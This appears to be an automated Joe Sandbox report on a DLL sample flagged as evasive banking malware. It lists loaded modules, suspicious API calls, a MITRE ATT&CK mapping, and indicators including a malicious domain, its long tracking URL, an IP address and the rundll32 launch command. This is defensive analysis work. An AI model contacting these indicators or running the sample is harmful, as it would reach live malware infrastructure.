Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-1929
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06622A81 FindFirstFileW,3_3_06622A81
Source: rundll32.exe, 00000003.00000002.22960045348.0000000003190000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960045348.0000000003152000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960045348.0000000003121000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03000005 VirtualAlloc,LoadLibraryA,LdrGetProcedureAddress,VirtualProtect,3_2_03000005
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C5C340 mov eax, dword ptr fs:[00000030h]0_2_00C5C340
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03000391 mov eax, dword ptr fs:[00000030h]3_2_03000391
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC1120 mov ebx, dword ptr fs:[00000030h]3_2_27AC1120

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.69.9 443Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C51090 cpuid 0_2_00C51090
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		111
Process Injection		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32		NTDS13
System Information Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
e.dll100%AviraHEUR/AGEN.1300770
e.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_c100%Avira URL Cloudmalware
https://w0t.lol/100%Avira URL Cloudmalware
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
http://www.quovadis.bm00%Avira URL Cloudsafe
https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
w0t.lol
104.21.69.9
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XAtrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.quovadis.bm0rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://w0t.lol/rundll32.exe, 00000003.00000002.22960045348.000000000317F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://ocsp.quovadisoffshore.com0rundll32.exe, 00000003.00000003.22959506464.00000000031A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.22960391062.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://w0t.lol/u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_crundll32.exe, 00000003.00000002.22960045348.0000000003121000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    104.21.69.9
    		w0t.lolUnited States
    		13335CLOUDFLARENETUStrue

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1519390
    Start date and time:2024-09-26 13:09:29 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 13m 11s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
    Run name:Suspected Instruction Hammering
    Number of analysed new started processes analysed:5
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:e.dll
    Detection:MAL
    Classification:mal80.bank.evad.winDLL@6/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 86%
    • Number of executed functions: 71
